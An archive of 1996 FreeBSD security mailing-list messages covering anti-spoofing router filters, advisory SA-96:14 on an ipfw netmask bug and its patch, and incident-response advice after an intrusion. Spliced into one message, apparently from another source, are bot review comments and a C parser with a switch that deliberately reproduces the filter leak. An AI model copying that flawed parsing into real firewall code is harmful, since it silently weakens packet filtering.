Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA27350 for security-outgoing; Mon, 24 Jun 1996 07:58:55 -0700 (PDT)
Received: from parkplace.cet.co.jp (parkplace.cet.co.jp [202.32.64.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA27324; Mon, 24 Jun 1996 07:58:49 -0700 (PDT)
Received: from localhost (michaelh@localhost) by parkplace.cet.co.jp (8.7.5/CET-v2.1) with SMTP id XAA07216; Mon, 24 Jun 1996 23:58:11 +0900 (JST)
Date: Mon, 24 Jun 1996 23:58:10 +0900 (JST)
From: Michael Hancock
To: Ollivier Robert
cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606241143.NAA09908@keltia.freenix.fr>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Maybe someone should ask pu.ru to filter outgoing non-pu.ru packets. Some
ISPs do this.

On Mon, 24 Jun 1996, Ollivier Robert wrote:

> It seems that Jordan K. Hubbard said:
> > How do you install such things on a cisco 2500? :-) Seriously, if
> > there's a way then I can get someone from cisco to help me out, but I
> > first need to know that it's even a reasonable request.
>
> If you use Serial0 for the Internet and A.B.C.0/24 in your internal
> network, use something like the following:
>
> !
> ! Refuses loose/strict source routed packets
> !
> no ip source-route
> !
> interface Serial0
> ip address A.B.C.254 255.255.255.0
> ip access-g 100 in
> ip access-g 101 out
>
> ...
>
> ! access list for incoming packets
> ! should fix most of the new attacks when a spoofed packet
> ! is trying to come from the outside with a source address
> ! from our network which is impossible.
> !
> no access-list 100
> !
> ! Rejects our own addresses C-Class A.B.C.0/24
> !
> access-list 100 deny ip A.B.C.0 0.0.0.255 any
> !
> ! Rejects EPITA B-Class 163.5.0.0/16
> !
> access-list 100 deny ip 163.5.0.0 0.0.255.255 any
> !
> ! Rejects special addresses
> !
> access-list 100 deny ip 127.0.0.0 0.255.255.255 any
> !
> ! RFC-1918 IANA reserved A/B/C classes
> ! A-Class 10.0.0.0/8
> !
> access-list 100 deny ip 10.0.0.0 0.255.255.255 any
> !
> ! B-Classes 172.16.0.0/12
> !
> access-list 100 deny ip 172.16.0.0 0.15.255.255 any
> !
> ! C-Classes 192.168.0.0/16
> !
> access-list 100 deny ip 192.168.0.0 0.0.255.255 any
> !
> ! Accepts the rest
> !
> access-list 100 permit ip any A.B.C.0 0.0.0.255
>
> --
> Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
> FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996
>

From owner-freebsd-security Mon Jun 24 09:02:56 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02283 for security-outgoing; Mon, 24 Jun 1996 09:02:56 -0700 (PDT)
Received: (from guido@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02256; Mon, 24 Jun 1996 09:02:51 -0700 (PDT)
Message-Id: <199606241602.JAA02256@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: guido set sender to security-officer@freebsd.org using -f
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org
Cc: freebsd-security@freebsd.org, first-teams@first.org
From: FreeBSD Security Officer
Reply-To: security-officer@freebsd.org
Subject: FreeBSD Security Advisory: FreeBSD-SA-96:14.ipfw
Date: Mon, 24 Jun 1996 09:00:00 -0700 (PDT)
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-96:14                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          Firewall filter leak with user level ipfw
Category:       core
Module:         ipfw
Announced:      1996-06-24
Affects:        FreeBSD -current Feb 24 1996 and later (ipfw.c rev 1.20)
                FreeBSD -stable Feb 26 1996 and later (ipfw.c rev 1.15.4.2)
Corrected:      Both FreeBSD -current and -stable as of Jun 23 1996
FreeBSD only:   yes
Patches:        ftp://freebsd.org/pub/CERT/patches/SA-96:14/
=============================================================================

I.   Background

FreeBSD is shipped with packet filtering code. This is implemented by
kernel level modules and user level programs. The user level program
ipfw, used to control the packet filtering code in the kernel, has a bug
in the way packet filter rules are interpreted.

II.  Problem Description

A potential problem exists when users specify mask addresses to ipfw(8)
using the address:mask syntax. Specifically, whenever the ':' syntax is
used, the resulting mask is always 0xffffffff.

III. Impact

Whenever the address:mask syntax is used, the actual packet filtering will
differ from the expected filtering, thus allowing or denying more packets
through the filter than intended.

IV.  Workaround

There is a simple workaround for this problem: do not use the address:mask
syntax. Instead, use the address/mask syntax. The implementation of the
latter way of specifying masks does not suffer from the mentioned bug.

V.   Solution

Apply one of the patches below, depending on your version of FreeBSD.
The patch is against /usr/src/sbin/ipfw/ipfw.c The following patch applies to -stable: Index: ipfw.c =================================================================== RCS file: /home/ncvs/src/sbin/ipfw/ipfw.c,v retrieving revision 1.15.4.4 retrieving revision 1.15.4.5 diff -u -r1.15.4.4 -r1.15.4.5 - --- ipfw.c 1996/06/18 02:03:29 1.15.4.4 +++ ipfw.c 1996/06/23 20:51:37 1.15.4.5 @@ -15,7 +15,7 @@ * * NEW command line interface for IP firewall facility * - - * $Id: ipfw.c,v 1.15.4.4 1996/06/18 02:03:29 alex Exp $ + * $Id: ipfw.c,v 1.15.4.5 1996/06/23 20:51:37 alex Exp $ * */ @@ -200,7 +200,7 @@ } if (chain->fw_flg & IP_FW_F_FRAG) - - printf("frag "); + printf(" frag "); if (chain->fw_ipopt || chain->fw_ipnopt) { int _opt_printed = 0; @@ -321,12 +321,22 @@ if (!inet_aton(*av,ipno)) show_usage("ip number\n"); - - if (md == ':' && !inet_aton(p,mask)) - - show_usage("ip number\n"); - - else if (md == '/') - - mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); - - else - - mask->s_addr = htonl(0xffffffff); + switch (md) { + case ':': + if (!inet_aton(p,mask)) + show_usage("ip number\n"); + break; + case '/': + if (atoi(p) == 0) { + mask->s_addr = 0; + } else { + mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); + } + break; + default: + mask->s_addr = htonl(0xffffffff); + break; + } av++; ac--; } @@ -611,10 +621,9 @@ break; case 'N': do_resolv=1; - - break; - - case '?': - - default: - - show_usage(NULL); + break; + default: + show_usage(NULL); } ac -= optind; @@ -645,7 +654,7 @@ } else { show_usage(NULL); } - - return 0; + return 0; } int This one applies to -current: Index: ipfw.c =================================================================== RCS file: /home/ncvs/src/sbin/ipfw/ipfw.c,v retrieving revision 1.26 retrieving revision 1.27 diff -u -r1.26 -r1.27 - --- ipfw.c 1996/06/18 01:46:34 1.26 +++ ipfw.c 1996/06/23 20:47:51 1.27 
@@ -16,7 +16,7 @@ * * NEW command line interface for IP firewall facility * - - * $Id: ipfw.c,v 1.26 1996/06/18 01:46:34 alex Exp $ + * $Id: ipfw.c,v 1.27 1996/06/23 20:47:51 alex Exp $ * */ @@ -256,7 +256,7 @@ } if (chain->fw_flg & IP_FW_F_FRAG) - - printf("frag "); + printf(" frag "); if (chain->fw_ipopt || chain->fw_ipnopt) { int _opt_printed = 0; @@ -408,12 +408,23 @@ if (lookup_host(*av,ipno) != 0) show_usage("ip number\n"); - - if (md == ':' && !inet_aton(p,mask)) - - show_usage("ip number\n"); - - else if (md == '/') - - mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); - - else - - mask->s_addr = htonl(0xffffffff); + switch (md) { + case ':': + if (!inet_aton(p,mask)) + show_usage("ip number\n"); + break; + case '/': + if (atoi(p) == 0) { + mask->s_addr = 0; + } else { + mask->s_addr = htonl(0xffffffff << (32 - atoi(p))); + } + break; + default: + mask->s_addr = htonl(0xffffffff); + break; + } + ipno->s_addr &= mask->s_addr; av++; ac--; } @@ -788,10 +799,9 @@ break; case 'N': do_resolv=1; - - break; - - case '?': - - default: - - show_usage("Unrecognised switch"); + break; + default: + show_usage("Unrecognised switch"); } ac -= optind; 
@@ -818,7 +828,7 @@ } else { show_usage("Bad arguments"); } - - return 0; + return 0; } int ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBMc22kFUuHi5z0oilAQEOBwP/WCVQZdHqv3ITppwCee3qNbe49nbNM4gc +s3DX4qMe4olAvpd2izhNzPJH3mrOXzKKJTrZOeouZFDUm099lS67xQnc7F343v8 iAJMtIZVlA58BmcQcSlmjqh9eqTgNyRIYpgYoefDKkgKE6eukWylariorUo+ppKe Tnpol2BUTXo= =Ut0+ -----END PGP SIGNATURE----- From owner-freebsd-security Mon Jun 24 09:04:35 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA02384 for security-outgoing; Mon, 24 Jun 1996 09:04:35 -0700 (PDT) Received: from critter.tfs.com ([140.145.16.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA02376; Mon, 24 Jun 1996 09:04:33 -0700 (PDT) Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id IAA06632; Mon, 24 Jun 1996 08:28:27 -0700 (PDT) To: "Jordan K. Hubbard" cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Sun, 23 Jun 1996 18:40:25 PDT." <8378.835580425@time.cdrom.com> Date: Mon, 24 Jun 1996 08:28:26 -0700 Message-ID: <6630.835630106@critter.tfs.com> 
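Review bot: in the @@ -321,12 +321,22 @@ hunk of the -stable patch (and the matching @@ -408,12 +408,23 @@ hunk for -current) the new '/' case guards only against a prefix length of 0, so `atoi(p)` is still unchecked above 32: a rule written as a.b.c.d/40 shifts `0xffffffff` by a negative count, which is undefined behaviour in C and gives an unpredictable mask, and a non-numeric prefix silently becomes /0 (mask 0, matching everything). Suggest rejecting values outside 0..32 with the same `show_usage("ip number\n")` used for a bad ':' mask; the ':' case could likewise reject a non-contiguous mask, since nothing in the hunk validates it beyond `inet_aton`.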
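Review bot: the -current hunk @@ -408,12 +408,23 @@ adds `+ ipno->s_addr &= mask->s_addr;` after the switch, so a rule given as 10.1.2.3/8 is stored as 10.0.0.0/8, but the -stable hunk @@ -321,12 +321,22 @@ has no such line and keeps the host bits in the stored address. Whether that changes matching depends on how the kernel compares (not visible here), but the two branches should either be made identical or the difference stated in section V of the advisory.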
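Review bot: the @@ -200,7 +200,7 @@ and @@ -256,7 +256,7 @@ hunks change only the output formatting of `printf("frag ")` to `printf(" frag ")`, which has nothing to do with the mask bug the advisory describes; bundling it (and the `case '?':` removal below it) with the security fix makes the patch harder to review and harder to apply to locally modified trees. Suggest a separate commit, or at least a sentence in section V saying which hunks are required for the fix.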
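Review bot: the @@ -645,7 +654,7 @@ hunk (and the -current @@ -818,7 +828,7 @@ one) shows `- - return 0;` against `+ return 0;`, i.e. only whitespace changes, and the doubled `- -` on every removed line throughout the patch is PGP dash escaping of the clearsigned message rather than part of the diff. The Notice at the end already warns that the patches may not apply cleanly for this reason; it would help readers to say explicitly that the leading `- ` must be removed, or the copies at the Patches URL in the header used instead, before running `patch`.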
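The following is an added example, not code from the advisory, from ipfw or from anyone in the thread: a small C reimplementation of the two address parsers (the if/else chain the advisory describes and the switch from the patch, plus a 0..32 range check the patch does not have), used to apply an inbound anti-spoof list like the Cisco access-list quoted earlier in the thread. `parse_quad` stands in for `inet_aton` and works in host byte order; 192.0.2.0/24 is a constructed stand-in for the unnamed A.B.C.0/24, and every rule string and address below is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Host-order stand-in for inet_aton(): returns 1 and sets *out on a
 * well-formed dotted quad, else 0 (also for a NULL string). */
static int parse_quad(const char *s, uint32_t *out)
{
    unsigned a, b, c, d;
    char tail;

    if (s == NULL || sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &tail) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return 0;
    *out = (a << 24) | (b << 16) | (c << 8) | d;
    return 1;
}

/* Parse "addr", "addr/bits" or "addr:mask".  buggy != 0 keeps the if/else
 * chain the advisory describes: when the ':' mask parses, the first test is
 * false and control falls to the "no mask given" default of 0xffffffff.
 * buggy == 0 mirrors the switch from the patch, plus a 0..32 range check
 * that the patch lacks.  Returns 0 on success, -1 on a malformed spec. */
static int parse_net(const char *spec, int buggy, uint32_t *addr, uint32_t *mask)
{
    char buf[64], *p, md = 0;
    uint32_t ipno = 0, m = 0;

    if (strlen(spec) >= sizeof buf)
        return -1;
    strcpy(buf, spec);
    if ((p = strpbrk(buf, ":/")) != NULL) {
        md = *p;        /* separator character, ':' or '/' */
        *p++ = '\0';    /* p now points at the mask text */
    }
    if (!parse_quad(buf, &ipno))
        return -1;

    if (buggy) {
        if (md == ':' && !parse_quad(p, &m))
            return -1;
        else if (md == '/')
            m = 0xffffffffU << (32 - atoi(p));   /* undefined for /0 */
        else
            m = 0xffffffffU;                     /* also reached for ':' */
    } else {
        switch (md) {
        case ':':
            if (!parse_quad(p, &m))
                return -1;
            break;
        case '/': {
            int bits = atoi(p);
            if (bits < 0 || bits > 32)           /* extra check, not in patch */
                return -1;
            m = bits == 0 ? 0 : 0xffffffffU << (32 - bits);
            break;
        }
        default:
            m = 0xffffffffU;
            break;
        }
    }
    *mask = m;
    *addr = ipno & m;   /* normalise, as the -current patch does */
    return 0;
}

/* 1 if host is inside the rule's network, 0 if not, -1 on a parse error. */
int rule_covers(const char *rule, const char *host, int buggy)
{
    uint32_t a, m, h;

    if (parse_net(rule, buggy, &a, &m) != 0 || !parse_quad(host, &h))
        return -1;
    return ((h ^ a) & m) == 0;
}

/* Inbound anti-spoof list in the spirit of access-list 100 in the thread,
 * written in the address:mask form the advisory warns about. */
static const char *const spoof_rules[] = {
    "192.0.2.0:255.255.255.0",   /* constructed stand-in for our A.B.C.0/24 */
    "127.0.0.0:255.0.0.0",
    "0.0.0.0:255.0.0.0",
    "10.0.0.0:255.0.0.0",
    "172.16.0.0:255.240.0.0",
    "192.168.0.0:255.255.0.0",
};

/* 1 if a packet with this source address must be dropped on the external
 * interface, 0 if it may pass.  With buggy != 0 every ':' rule collapses
 * to a single host, so 10.1.2.3 from outside is let through. */
int deny_inbound_source(const char *src, int buggy)
{
    size_t i;

    for (i = 0; i < sizeof spoof_rules / sizeof spoof_rules[0]; i++)
        if (rule_covers(spoof_rules[i], src, buggy) == 1)
            return 1;
    return 0;
}
```

Rewriting the same list with the `/bits` syntax makes both parsers agree, which is the advisory's workaround.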
From: Poul-Henning Kamp
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <8378.835580425@time.cdrom.com>, "Jordan K. Hubbard" writes:
>Also, I think that calling the FBI on this one is only likely to get
>me put on infinite hold when they hear that the perpetrator is in
>Russia. :-)

Yes, Russia would be a CIA issue.

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.

From owner-freebsd-security Mon Jun 24 10:04:39 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA05776 for security-outgoing; Mon, 24 Jun 1996 10:04:39 -0700 (PDT)
Received: from who.cdrom.com (who.cdrom.com [204.216.27.3]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA05767; Mon, 24 Jun 1996 10:04:37 -0700 (PDT)
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by who.cdrom.com (8.6.12/8.6.11) with ESMTP id KAA09983 ; Mon, 24 Jun 1996 10:04:32 -0700
Received: (from narvi@localhost) by haldjas.folklore.ee (8.6.12/8.6.12) id UAA26632; Mon, 24 Jun 1996 20:05:05 +0300
Date: Mon, 24 Jun 1996 20:05:05 +0300 (EET DST)
From: Narvi
To: Terry Lambert
cc: "Jordan K. Hubbard" , guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606240651.XAA27306@phaeton.artisoft.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 23 Jun 1996, Terry Lambert wrote:

> > Hmmm. We have reason to believe that he *didn't* get root (though
> > we're still assuming he did, just to be paranoid) and if the mod times
> > can be trusted, hosts.equiv hasn't been touched in many months (and
> > localhost is commented out).
>
> 1) Do not believe this. Assume he got root.
> 2) Assume your password changes are mailed out as cleartext by
> your passwd program.
> 3) Assume md5 and checksum have been hacked to lie about
> themselves and any other files affected.
> 4) Assume system time stamps were changed.
> 5) Assume all log files were edited.
> 6) Best approach: reinstall the system (from distribution,
> not backup --- no telling how long he was there).
> 7) Turn off the stupid "password must meet these criteria"
> on the password change. All it does is reduce the search
> space a hacker needs to apply.
> 8) Put spoofing filters on your firewall; basically, look for
> the response bit.
> 9) Make sure you aren't running routed -q.
> 10) Turn off source routing on your gateway, if it's on.

Now are there some more things someone whose system was broken into
could look for? Perhaps some passwords should be switched to S/Key -
it should be possible to generate them on a remote machine and then
install?

>
> If you need help getting the FBI involved, tell them you had "munitions"
> on the machine. ;-).

The "secure" part of distribution + DES actually are so by the definition,
no matter that he could have downloaded them from much nearer...
Sander
who is by no means a security specialist

>
>
> Terry Lambert
> terry@lambert.org
> ---
> Any opinions in this posting are my own and not those of my present
> or previous employers.
>

From owner-freebsd-security Mon Jun 24 10:08:03 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA06312 for security-outgoing; Mon, 24 Jun 1996 10:08:03 -0700 (PDT)
Received: from critter.tfs.com ([140.145.16.108]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA06287; Mon, 24 Jun 1996 10:08:01 -0700 (PDT)
Received: from critter.tfs.com (localhost [127.0.0.1]) by critter.tfs.com (8.7.5/8.7.3) with ESMTP id KAA07506; Mon, 24 Jun 1996 10:07:30 -0700 (PDT)
To: nash@mcs.com
cc: nate@sri.MT.net, freebsd-security@FreeBSD.org, gpalmer@FreeBSD.org, taob@io.org
Subject: Re: IPFW documentation
In-reply-to: Your message of "Sun, 23 Jun 1996 17:31:22 CDT." <199606232231.RAA00403@zen.nash.org>
Date: Mon, 24 Jun 1996 10:07:28 -0700
Message-ID: <7504.835636048@critter.tfs.com>
From: Poul-Henning Kamp
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <199606232231.RAA00403@zen.nash.org>, Alex Nash writes:
>> I hope we get reviewers, but if you don't I'd still bring it into
>> -stable since you've given 'fair notice'.
>
>That's two votes for, none against :)

I don't think that there are any votes against as such. What I told
(tried to tell) Alex was, "unless you're VERY sure it works, don't touch
-stable". I guess the mask-bug with my name on it underlines this
statement :-(

I don't have a testing environment here, much less a development one,
so I'm pretty unable to help, sorry!

--
Poul-Henning Kamp           | phk@FreeBSD.ORG       FreeBSD Core-team.
http://www.freebsd.org/~phk | phk@login.dknet.dk    Private mailbox.
whois: [PHK]                | phk@ref.tfs.com       TRW Financial Systems, Inc.
Future will arrive by its own means, progress not so.

From owner-freebsd-security Mon Jun 24 10:25:17 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA08350 for security-outgoing; Mon, 24 Jun 1996 10:25:17 -0700 (PDT)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA08343; Mon, 24 Jun 1996 10:25:14 -0700 (PDT)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id KAA28491; Mon, 24 Jun 1996 10:19:22 -0700
From: Terry Lambert
Message-Id: <199606241719.KAA28491@phaeton.artisoft.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: narvi@haldjas.folklore.ee (Narvi)
Date: Mon, 24 Jun 1996 10:19:22 -0700 (MST)
Cc: terry@lambert.org, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.ORG, security@FreeBSD.ORG, ache@FreeBSD.ORG
In-Reply-To: from "Narvi" at Jun 24, 96 08:05:05 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> Now are there some more things someone whose system was broken into
> could look for? Perhaps some passwords should be switched to S/Key -
> it should be possible to generate them on a remote machine and then
> install?

SUID/SGID programs. Permission changes on devices. Compiler changes.
Changes to ld.so. Kernel modules that weren't there before. RC file
changes.

The list is endless, which is why you reinstall. You can trust every
binary from the distribution media.

When the 414's broke into a machine I was administering, it got
reinstalled, period. Using security logs (which you have to have in
place before the fact), we were able to trace back to the original MAC
address ... to a specific machine in a specific lab on a college campus,
with the cooperation of the terminal server there. The same loose
security that let him hack from there let us locate him.

Within 8 hours, the system was fully firewalled and back on line (with
all attempt logging active).

The most stupid thing I have ever seen someone do was asserting "we're
smarter than them; we're going to let them come in, and we'll catch them
red handed". Then they decided to establish a secure zone and expand it,
instead of cutting off the net access and establishing a switchable
zone. This rendered the computers of a large number of engineers useless
for a relatively long period of time...
the net effect was about $1.2M in costs for idle engineering time plus
facility costs.

If you have a problem system, dike it out of your network. If you have a
problem terminal server, take it off line and fix it. If you have a
problem office, deny it access to the corporate net until the problem is
resolved. A couple of plane tickets and some hotel bills to get your
experts on site is a hell of a lot less expensive and more effective
than trying to run an uncooperative hacker by wire in an ill-thought
attempt to demonstrate your own brilliance.

Further discussion should probably go to "chat" or "security".

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

From owner-freebsd-security Mon Jun 24 10:37:19 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA10302 for security-outgoing; Mon, 24 Jun 1996 10:37:19 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA10284; Mon, 24 Jun 1996 10:37:12 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id TAA16762; Mon, 24 Jun 1996 19:34:08 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606241734.TAA16762@gvr.win.tue.nl>
Subject: Re: I need help on this one - please help me track this guy down!
To: narvi@haldjas.folklore.ee (Narvi)
Date: Mon, 24 Jun 1996 19:34:07 +0200 (MET DST)
Cc: terry@lambert.org, jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: from Narvi at "Jun 24, 96 08:05:05 pm"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> Now are there some more things someone whose system was broken into
> could look for? Perhaps some passwords should be switched to S/Key -
> it should be possible to generate them on a remote machine and then
> install?
>

Another good idea is to start using the /etc/login.access file. For me,
all logins will originate from a small set of machines...

-Guido

From owner-freebsd-security Mon Jun 24 10:44:03 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA11370 for security-outgoing; Mon, 24 Jun 1996 10:44:03 -0700 (PDT)
Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA11249; Mon, 24 Jun 1996 10:43:36 -0700 (PDT)
Received: (from narvi@localhost) by haldjas.folklore.ee (8.6.12/8.6.12) id UAA26882; Mon, 24 Jun 1996 20:48:19 +0300
Date: Mon, 24 Jun 1996 20:48:18 +0300 (EET DST)
From: Narvi
To: jaeger
cc: "Jordan K. Hubbard" , Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 23 Jun 1996, jaeger wrote:

>
>
> On Sun, 23 Jun 1996, Jordan K. Hubbard wrote:
>
> > All we have are the "last" logs, which show:
> >
> > jkh ttyp2 a235.pu.ru Sun Jun 23 16:50 - 17:18 (00:28)
> > jkh ttyp3 a235.pu.ru Sun Jun 23 15:00 - 15:34 (00:33)
> >
> > If someone at the russian site could help correlate this time (PST) to
> > the local time at wherever a235.ru.pu came in from, we could at least
> > narrow down which user(s) it might have been.
> >
> This appears to be a Dialup IP connection. If the machine logging
> the terminal server (or other dialup access device) wasn't root compromised,
> we should see some useful logs. Probably a stolen account.
> Because of the presence of the lastlog records and the generally
> good security of FreeBSD, I also suspect there was no root compromise on
> wcarchive. I'm concerned about the possibility of a DNS server compromise,
> given the unusual traceroute results of the intruder's IP.
> On another pessimistic note, I believe most of the telco switches in
> Russia are still crossbars, which could make any attempt to trace the
> intruder through the phone system fruitless. :<

You may be mistaken on that one... The phone calls in the former Soviet
Union used to be traceable :-( So it could be possible to find it out if
measures are taken urgently - and I think it has to be the owner of the
dial up connection - provided there aren't hundreds of calls per day.
Sander

>
>
> > Jordan
> >
>
> -jaeger
>

From owner-freebsd-security Mon Jun 24 10:44:32 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA11533 for security-outgoing; Mon, 24 Jun 1996 10:44:32 -0700 (PDT)
Received: from brasil.moneng.mei.com (brasil.moneng.mei.com [151.186.109.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA11409; Mon, 24 Jun 1996 10:44:13 -0700 (PDT)
Received: (from jgreco@localhost) by brasil.moneng.mei.com (8.7.Beta.1/8.7.Beta.1) id MAA05936; Mon, 24 Jun 1996 12:43:33 -0500
From: Joe Greco
Message-Id: <199606241743.MAA05936@brasil.moneng.mei.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: michaelh@cet.co.jp (Michael Hancock)
Date: Mon, 24 Jun 1996 12:43:33 -0500 (CDT)
Cc: security@freebsd.org, hackers@freebsd.org, isp@freebsd.org
In-Reply-To: from "Michael Hancock" at Jun 24, 96 11:58:10 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> Maybe someone should ask pu.ru to filter outgoing non-pu.ru packets. Some
> ISPs do this.

Any ISP that doesn't is (IMNSHO) screaming their incompetence.

...
Joe
-------------------------------------------------------------------------------
Joe Greco - Systems Administrator                          jgreco@ns.sol.net
Solaria Public Access UNIX - Milwaukee, WI                     414/546-7968

From owner-freebsd-security Mon Jun 24 12:21:28 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA23956 for security-outgoing; Mon, 24 Jun 1996 12:21:28 -0700 (PDT)
Received: from linux4nn.gn.iaf.nl (root@linux4nn.gn.iaf.nl [193.67.144.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA23924; Mon, 24 Jun 1996 12:21:08 -0700 (PDT)
Received: from uni4nn.iaf.nl (root@uni4nn.iaf.nl [193.67.144.33]) by linux4nn.gn.iaf.nl (8.6.9/8.6.9) with SMTP id VAA21509; Mon, 24 Jun 1996 21:19:58 +0200
Received: by uni4nn.iaf.nl with UUCP id AA08962 (5.67b/IDA-1.5); Mon, 24 Jun 1996 21:19:37 +0200
Received: by iafnl.es.iaf.nl with UUCP id AA15588 (5.67b/IDA-1.5); Mon, 24 Jun 1996 20:42:36 +0200
Received: (from wilko@localhost) by yedi.iaf.nl (8.6.12/8.6.6) id UAA01054; Mon, 24 Jun 1996 20:19:35 +0200
From: Wilko Bulte
Message-Id: <199606241819.UAA01054@yedi.iaf.nl>
X-Organisation: Private FreeBSD site - Arnhem - The Netherlands
Subject: Re: I need help on this one - please help me track this guy down!
To: jkh@time.cdrom.com (Jordan K. Hubbard)
Date: Mon, 24 Jun 1996 20:19:35 +0200 (MET DST)
Cc: guido@gvr.win.tue.nl, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org
In-Reply-To: <10346.835598093@time.cdrom.com> from "Jordan K. Hubbard" at Jun 23, 96 11:34:53 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

As Jordan K. Hubbard wrote...
> > ip address. Unless of course you either block packets coming from localhost
> > or block source routed packets.
>
> Oh yeah, also, David says both we and CRL (the ISP) block source
> routed packets.
>
> Jordan

This makes me wonder: can ijppp also block source routed packets?
From the man page I don't see how...

